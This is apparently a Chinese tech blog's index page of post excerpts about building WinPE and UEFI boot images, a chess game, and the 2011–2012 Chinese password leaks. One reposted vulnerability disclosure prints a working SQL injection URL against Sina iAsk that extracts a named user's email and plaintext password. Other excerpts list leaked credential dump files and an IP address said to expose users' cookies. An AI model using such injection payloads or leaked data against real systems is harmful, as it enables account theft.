支持Explorer桌面的WinPE3.1纯净制作步骤与技术要点
(Wingwy文章基础上的补充)
2012-4-20于深圳

特别说明:本文绝大部分是参考以下原创文章,只是在我实践后进行归纳、准确、详细的描述。按照本文,有一定电脑知识的应能很快做出纯净(这里的纯净指不带任何你不放心的文件,全部是微软官方文件)的带Explorer桌面的、具备Windows基本功能的WinPE3.1。参考文献:
http://www.wingwy.com/archives/2011_02_857.html
http://www.wingwy.com/archives/2011_11_961.html
我制作的WinPE文件对比与拷贝程序(开源)、支持Explorer的文件清单、注册表导出项文件(一系列reg文件,用于快速修改注册表)。
阅读全文

wim封装xp和win7:视频和下载

其实用imagex封装wim格式的xp技术很早就有了,这种技术也分两种。一种相对简单,用imagex手工打包再展开wim文件就行了。这种方法不能方便的实现分区,引导或是合盘,对大部分电脑用户来说还是比较麻烦。另一种则是我在08年的时候做过的把xp安装文件附加到install.wim文件中,可以直接从vista的安装程序安装xp。当时受限于网络,没有放出样品,如果你有一定的基础,按照那2篇文章肯定可以做出来,感兴趣的朋友可以参考“详解:用imagex封装xp/vista/server2008 x86/x64 的6合1安装盘” http://www.wingwy.com/archives/2008_07_139.html 这篇文章。现在win7都出了几年了,还是有很多同学让我给他们装xp,看来xp还是有很大市场的,所以我也重新用wim封装了xp,并在这里放出视屏和样品下载。最后我的成品如下图,win7和xp的四合一安装盘(包括32位win7sp1、64位win7sp1、32位xpsp3和64位xpsp2)。
xp与win7合盘

1 wim封装(imagex)的优点
阅读全文

新的uefi启动的win8pe4.0在这里 http://www.wingwy.com/archives/2013_03_1240.html

早就听说efi和uefi,不过接触的新机器还都是bios模式的,没法体验。今年2月vm 8.0.2版本总算支持模拟uefi模式启动了,以后uefi也会慢慢代替古老的bios。这两天试了一下,以上一个“支持32位程序的64位winpe3.1修正版3” 为蓝本做了个支持uefi模式启动的64位pe:wingwy-pe3.1-v2-fix3-uefi,可以同时实现uefi和bios的双启动。因为接触uefi才这几天,有些问题我也不清楚,在这里讨论一下,期待各位网友的解答。

1 先说下efi和uefi

efi/uefi被视为bios的代替着,最基本的定义什么的就不啰嗦了,大家搜搜就有了。值得注意的是uefi的u意思是unified,由efi 1.10版发展起来的。早期的efi有32位和64位不同的shell,不过标准的uefi只支持64位了(据说有的厂家修改后任然支持32位),所以64位pe能从uefi的机器上启动。

阅读全文

新的uefi启动的win8pe4.0在这里 http://www.wingwy.com/archives/2013_03_1240.html

此版本是64位pe3.1第二版的第3次修正。以前的一个版本是 支持32位程序的64位winpe3.1修正版2(wingwy-pe3.1-v2-fix2) 。

感谢各位网友的支持和反馈,这个版本增加了许多驱动程序,现在可以更好的支持大部分主板,硬盘(SCSI,SATA等),网卡,无线网卡,以及usb3.0了。此版本pe可能最少需要1g内存才能很好的运行,考虑到用64位pe的用户电脑配置一般都不低,这应该不是问题。这个版本同样是对上一个pe的一些问题进行修正,没有太多新的功能性的东西,老电脑或是内存较小的用户可以继续用以前的版本。

修正说明:

1 更新Ghost64到11.5.1.2269 (这个版本解决了分区对齐问题,对用ssd的网友很有用),修复以前64位ghost在snb平台的问题,i7的cpu应该可以用了。

阅读全文

好久没下棋了,几年春节回家下了两盘。感觉其中有一盘还有点意思,记得不太清楚了,还是尝试复盘了一下,大概就是下面这样。执红,黑先。


黑方 红方
1.炮2平5 炮二平五
2.马2进3 马二进三
3.马8进7 车一平二
4.炮8平9 车二进六
5.车9平8 车二平三
6.车8进2 炮八平六 阅读全文

Sina这个公司,再出了这么大的泄密事件后还用明文存密码。另外,大家可以关注这个ip 114.255.171.227 它记录了包括访问铁道部网站12306的所有途径用户的信息,包括IP地址,发送的请求,包含的cookie等等,而且,每个人都可以直接访问下载。据说铁道订票网站也是以明文传递密码的。你觉得他们是无知和无意的吗?

这是转载的 “2012年新浪微博用户密码泄露漏洞”http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html

相关厂商:www.sina.com
作者:http://weibo.com/evilniang
发现时间:2012-1-1
漏洞类型:sql注射
危害等级:高
漏洞状态:已修复

首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。

新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11–

这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。
阅读全文

这回的泄密事件越闹越大了,如果说CSDN的600万密码还是一个偏向程序员的社区,那么天涯的4000万密码泄露对普通人影响就大得多了。也许你目前还可以庆幸,你的密码没有泄露,但你马上就要担心了,用过qq吧?如果qq密码也能下载了呢?如果有人放出 qq8000万.rar 甚至 qq2亿.rar 的下载地址你是不是傻眼了?

12/27*注:网上流传腾讯泄露的用户密码是3亿,下载文件是 tencen_qq (3E数据库).rar 4.38GB 解压后是SJK800.MDB ,但没有下载地址。 看到这里反而安心了,这个多半是假的,这个4.38GB的文件大小像是某个iso改的文件名。退一万步,即使是真的,一个压缩后都有4.38G大的mdb文件全中国也没几台个人电脑能打开:)

追溯这回的密码门事件,似乎最开始是2011年12月5日,一个自称 秒杀小组 臭小子 的用户在wooyun上发了一个“中国各大站点数据库暴光(腾讯的也有) ”的漏洞。 现在还可以看到连接,http://www.wooyun.org/bugs/wooyun-2010-03523 据称是入侵了腾讯数据库,并放出了图
大家可以看到,他拿到了用户加密后的密码和用户信息。这种一长串的字符串其实就是经过处理的密码。比如
密码123456 经过md5一次哈西处理后就是 e10adc3949ba59abbe56e057f20f883e。拿到这种处理后的字符离拿到你的真实密码就只有时间问题了。如果你的密码不够强,随着计算机的发展,原始的暴力穷举破解也变得有可能。而这回密码门事件泄露出的近1亿密码正好成为一个字典库,用来破解密码更快了。
阅读全文

没看错,这回是天涯社区的4000万用户名密码被泄露下载了。泄露的文件是 天涯社区.kz ,有近4千万用户资料和明文密码。前几天还觉得不大可能,现在看来一切都是真的了。

当初CSDN爆出密码门的时候在网上google发现一个网友“臭小子”放出很多网站的密码包的截图,然后他的网盘被人黑了被人。下面的留言一片嘲讽,说他炫耀。我当时也觉得不大可能,一般网站都不会明文保存密码,经过MD5哈希处理的密码是不可逆的,所以即使入侵了数据库,要全部解出这么多密码也需要大量的时间。看来这个想法太落后了,不知道什么漏洞被爆了,这回和天涯4000w密码一起爆出来的下载据说还有新浪微博的,weibo.com_12160.rar 不想测试了,未来还会有很多网站密码被爆的。参考下图,以后的下载会有 51cto数据库.zip cnBeta数据库.tgz CNZZ数据库.rar eNet数据库.rar IS数据库.kz UUU9.rar YY数据库.zip 百合网数据库.zip 金山毒霸.zip 开心网.rar 美空数据库.zip 世纪佳缘数据库.zip 天涯数据库.zip 珍爱网数据库.zip 走秀网.rar。。。。。。。。。。。大家做好改密码的准备吧。
密码泄露
阅读全文

昨天泄露csdn密码包后,又有多家网站用户密码外泄。近1亿个用户密码被爆,目前均有迅雷下载链接。包括:

CSDN-中文IT社区-600万.rar 104MB
多玩网_800W.rar 216MB
人人网500W_16610.rar 49.5MB
猫1000W_8228.rar 91.9MB
嘟嘟牛_66277.rar 205MB
7k7k2000万_2047.rar 194MB
178(1000w)_3087.rar 103MB

不过到今天下午,上述迅雷连接全部失效。目前看来除了据说是mop的猫1000W_8228.rar未能下载之外,其他爆出的用户名密码都是真实的。泄露的密码有的不是明码,像 7k7k2000万_2047.rar 中,既有明文密码又有处理过的MD5哈希值。至于 猫1000W_8228.rar 这个文件,在迅雷离线上下到80%就不动了。估计业界开始控制这些文件的传播了。而CSDN-中文IT社区-600万.rar 和人人网500W_16610.rar 已经有了ed2k的下载,估计还会继续流传。

阅读全文

刚看到消息,CSDN用户密码被破解,600万账号密码泄露。想当初注册的时候还觉得CSDN很靠谱,国内知名的it类网站,结果密码竟然这样泄露了。在网上下载下来搜了一下,还好没有我。不过发现好几个id相似的,还发现两个本科同学的id和他们的邮件地址。。。。。不过还好,他们都是随便注册了一下,密码都是123之类的也就无所谓。

提醒大家,不同性质的网站密码要分开,网络很不安全,出了事情很麻烦。现在那个泄露的原始的密码文件 csdn-中文it社区-600万.rar 在迅雷离线下载和qq旋风的离线下载里面好像被删除了,希望传播不多。
阅读全文